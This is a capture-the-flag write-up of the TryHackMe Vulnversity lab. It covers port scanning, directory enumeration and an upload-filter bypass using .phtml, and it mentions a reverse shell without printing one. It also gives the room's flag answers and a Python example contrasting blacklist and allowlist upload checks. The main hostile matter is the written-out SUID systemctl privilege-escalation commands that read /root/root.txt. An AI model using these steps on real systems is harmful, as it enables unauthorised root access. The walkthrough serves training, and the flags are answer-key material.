[TryHackMe] Vulnversity

Penetration/TryHackMe

by obscurity_ 2024. 9. 12. 23:22

✅Scan the box; how many ports are open?
┌──(root㉿kali)-[~/hack/LAB/vulnversity]
└─# nmap -p- --open --max-retries 1 --min-rate 3000 10.10.178.151 -Pn      
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-09-12 21:48 KST
Nmap scan report for 10.10.178.151
Host is up (0.29s latency).
Not shown: 65391 closed tcp ports (reset), 138 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3128/tcp open  squid-http
3333/tcp open  dec-notes

Nmap done: 1 IP address (1 host up) scanned in 24.65 seconds

Answer : 6

✅What version of the squid proxy is running on the machine?
┌──(root㉿kali)-[~/hack/LAB/vulnversity]
└─# nmap -sV -sC -Pn -p 3128 10.10.178.151                            
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-09-12 21:50 KST
Nmap scan report for 10.10.178.151
Host is up (0.37s latency).

PORT     STATE SERVICE    VERSION
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.12

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 21.80 seconds

Answer : 3.5.12

✅How many ports will Nmap scan if the flag -p-400 was used?

Answer : 400

✅What is the most likely operating system this machine is running?
No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).
TCP/IP fingerprint:

Network Distance: 5 hops

OS detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 19.46 seconds

Answer : Ubuntu

✅What port is the web server running on?

Answer : 3333

✅It's essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don't forget that ports on a higher range might be open, so constantly scan ports after 1000 (even if you leave checking in the background).

Answer : YES

✅What is the flag for enabling verbose mode using Nmap?

Answer : -V

✅I have successfully configured Gobuster.

Answer : YES

✅What is the directory that has an upload form page?
┌──(root㉿kali)-[~/hack/LAB/vulnversity]
└─# gobuster dir -k -w /usr/share/dirb/wordlists/common.txt -u <http://10.10.178.151:3333/>
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     <http://10.10.178.151:3333/>
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 294]
/.htaccess            (Status: 403) [Size: 299]
/.htpasswd            (Status: 403) [Size: 299]
/css                  (Status: 301) [Size: 319] [--> <http://10.10.178.151:3333/css/>]
/fonts                (Status: 301) [Size: 321] [--> <http://10.10.178.151:3333/fonts/>]
/images               (Status: 301) [Size: 322] [--> <http://10.10.178.151:3333/images/>]
/index.html           (Status: 200) [Size: 33014]
/internal             (Status: 301) [Size: 324] [--> <http://10.10.178.151:3333/internal/>]
/js                   (Status: 301) [Size: 318] [--> <http://10.10.178.151:3333/js/>]

Answer : /internal/

✅What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.

Answer : .php

✅I understand the Burpsuite tool and its purpose during pentesting.

Answer : YES

✅What extension is allowed after running the above exercise?

Answer : .phtml
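As an added example (not code from this post or the room), here is the pattern behind that result: a blacklist check that rejects .php yet lets .phtml through, beside an allowlist check that also covers double extensions and dotfiles, which goes a little beyond the single case above. The extension sets and function names are assumptions for this example; the box's real filter is not shown in the post.

```python
import os
import secrets
from typing import Optional

# Assumed blacklist for this example. The post saw the form reject ".php" but accept ".phtml";
# on a typical Ubuntu/Apache mod_php setup .phtml (and .phar) are handed to the PHP interpreter
# as well, so a list of "known bad" suffixes is bypassed by whichever sibling it forgot.
BLOCKED_EXTENSIONS = {".php", ".php3", ".php4", ".php5"}

# Hardened alternative: name only what the form actually needs (assumed set for this example).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}


def blacklist_allows(filename: str) -> bool:
    """Weak check: anything not explicitly blocked passes, so shell.phtml gets through."""
    _, ext = os.path.splitext(filename)
    return ext.lower() not in BLOCKED_EXTENSIONS


def allowlist_allows(filename: str) -> bool:
    """Hardened check: every suffix after the first dot must be on the allowlist, so
    shell.phtml, shell.phtml.jpg and .htaccess are all rejected."""
    base = os.path.basename(filename)        # drop any client-supplied path component
    if not base or base.startswith("."):     # no empty names, no dotfiles such as .htaccess
        return False
    parts = base.lower().split(".")
    return len(parts) >= 2 and all(p in ALLOWED_EXTENSIONS for p in parts[1:])


def safe_stored_name(filename: str) -> Optional[str]:
    """Server-chosen name for an accepted upload: random basename plus the validated
    extension, so the client never controls where or as what the file is stored.
    Returns None when the upload must be rejected."""
    if not allowlist_allows(filename):
        return None
    ext = os.path.basename(filename).lower().rsplit(".", 1)[1]
    return f"{secrets.token_hex(8)}.{ext}"
```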

✅While completing the above exercise, I have successfully downloaded the PHP reverse shell.

Checked the path where the uploaded file was stored and executed it.

Checked which software was available on the target for the reverse shell connection.

Got an initial foothold with the Python3 reverse shell script obtained from revshell.

Answer : YES

✅What is the name of the user who manages the webserver?
www-data@vulnuniversity:/home$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Jul 31  2019 .
drwxr-xr-x 23 root root 4096 Jul 31  2019 ..
drwxr-xr-x  2 bill bill 4096 Jul 31  2019 bill

Answer : bill

✅What is the user flag?
www-data@vulnuniversity:/home$ cd bill
www-data@vulnuniversity:/home/bill$ ls -la
total 24
drwxr-xr-x 2 bill bill 4096 Jul 31  2019 .
drwxr-xr-x 3 root root 4096 Jul 31  2019 ..
-rw-r--r-- 1 bill bill  220 Jul 31  2019 .bash_logout
-rw-r--r-- 1 bill bill 3771 Jul 31  2019 .bashrc
-rw-r--r-- 1 bill bill  655 Jul 31  2019 .profile
-rw-r--r-- 1 bill bill   33 Jul 31  2019 user.txt
www-data@vulnuniversity:/home/bill$ cat user.txt
8bd7992fbe8a6ad22a63361004cfcedb

Answer : 8bd7992fbe8a6ad22a63361004cfcedb

✅On the system, search for all SUID files. Which file stands out?
www-data@vulnuniversity:/home/bill$ find / -type f -perm -4000 2>/dev/null 
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs

Answer : /bin/systemctl

✅What is the root flag value?
www-data@vulnuniversity:/home/bill$ cd /bin
www-data@vulnuniversity:/bin$ TF=$(mktemp).service
www-data@vulnuniversity:/bin$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/bin$ ./systemctl link $TF
Created symlink from /etc/systemd/system/tmp.emh8H8dSWF.service to /tmp/tmp.emh8H8dSWF.service.
www-data@vulnuniversity:/bin$ ./systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.emh8H8dSWF.service to /tmp/tmp.emh8H8dSWF.service.
www-data@vulnuniversity:/bin$ cat /tmp/output    
a58ff8579f0a9270368d33a9966c7fd5

Answer : a58ff8579f0a9270368d33a9966c7fd5
